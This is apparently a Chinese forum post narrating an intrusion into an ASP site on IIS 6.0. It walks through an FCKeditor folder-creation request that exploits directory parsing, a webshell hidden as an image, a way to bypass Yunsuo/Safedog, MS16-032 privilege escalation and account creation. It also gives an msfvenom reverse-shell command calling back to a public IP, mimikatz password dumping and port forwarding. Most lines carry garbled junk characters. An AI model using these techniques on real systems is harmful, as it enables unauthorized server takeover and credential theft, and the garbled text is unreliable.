|
! c3 f( t( q1 ]9 j) ^
# `- c, X# X `7 ]& e7 V( Z
6 `8 H8 u& S2 J/ U ) I+ n0 W) W p$ l, k1 X! q
| 4 o2 J, ] ?$ |5 R2 k# a
) }; n, I; q8 ]9 n7 k* P; {1 n
9 Y- N4 k% p4 U3 ]一、 利用getwebshell篇
7 M. I- D/ D8 J9 }
, f" B2 `5 t% F, \7 l/ }$ |5 I6 @首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
0 u/ H% Q7 X' w- ]: C9 n; u9 h7 O
% Y$ W: i% {, s, b' m
# ]0 b; m9 h7 i3 R( t2 c! L( p8 o
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 R1 A' Q2 x1 \$ W. F1 L
+ J4 [8 V6 m3 w" I# V! b$ ]
下面我们构造一个asp目录,如: - l. M& x, v1 w, |
- M6 ]% J# W N4 M0 d
" N& m1 Z9 u0 T! m# \: Z http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ) i4 H- I; D" u4 S9 e6 G$ B
+ s: }4 @2 d! h0 j
4 ~" t2 V: Y3 _" a/ t1 n H+ f 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
# s- e. k4 p4 w9 ]8 H! L8 ]- q) ^: C
# Y3 Q5 m; b6 d: N' |2 P* G
一、 绕过安全狗云锁提权并且加账号
8 n$ i/ K! p: i. ~, P+ b
, p7 J( w) H6 | Y. I2 x% j3 `没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
# ^1 O% l8 K/ \5 Z5 _; Q! y
4 Z8 @7 O6 @" n) T$ @如图:
0 ?6 q* ]( x. ~) ^
1 h( y, p: `; p* |7 j& G
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
7 a' w% R" V- k
+ w8 X7 n/ p$ d- ?
一、 利用metasploit
0 p" j5 _1 L" B: n+ [0 L
2 D# z. D0 |* S6 y. v
首先用pentestbox生成一个64位的payload如下命令
3 E k4 v, j# a; f+ | a/ h
; U: l$ K+ L6 s6 ^+ \" A
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
1 f. u: a. I& e1 [
' y5 c- P$ {9 ^
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
$ M6 C% ]; J f* t0 g
# g7 t3 e( l P0 u5 e& N下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
3 V: Q5 G4 \4 y, Z) A
A/ Y- Q! X2 ]. S8 a下面我们来做一个监听如下命令:
' \! ~ O, S: R( X8 K" ]4 v
, U3 a" y6 g$ s! N# d* Bportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
`6 R6 E& Z0 o5 z ' t$ K8 S( N: `& @) u3 t q
( I1 v4 H! J: x2 r1 e | 9 f6 t: Q1 G! x1 b$ g
5 o' A# ]5 V% M3 ?5 s
) I4 P7 `4 C& \2 F& g9 r+ D
s$ j1 t6 P$ d" w6 E9 `
* ~' C7 m1 J& \) N
W6 n5 w, n2 T# k2 d
" {5 N: T% B# @0 O, Q( ?1 t
& I* e' Y, P8 l, ?8 w! j
8 ]) P; F* `$ t" G* R& v8 ~! e# B
4 B n2 {' X( L0 m( y) {+ `
2 P; b0 M4 D# H( G# b% `8 m
) o! }. z( [5 |% \9 _9 c
$ n% Q1 \% \" d% C0 B7 p w
; a% }8 ~' x; A% @" j& y | 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06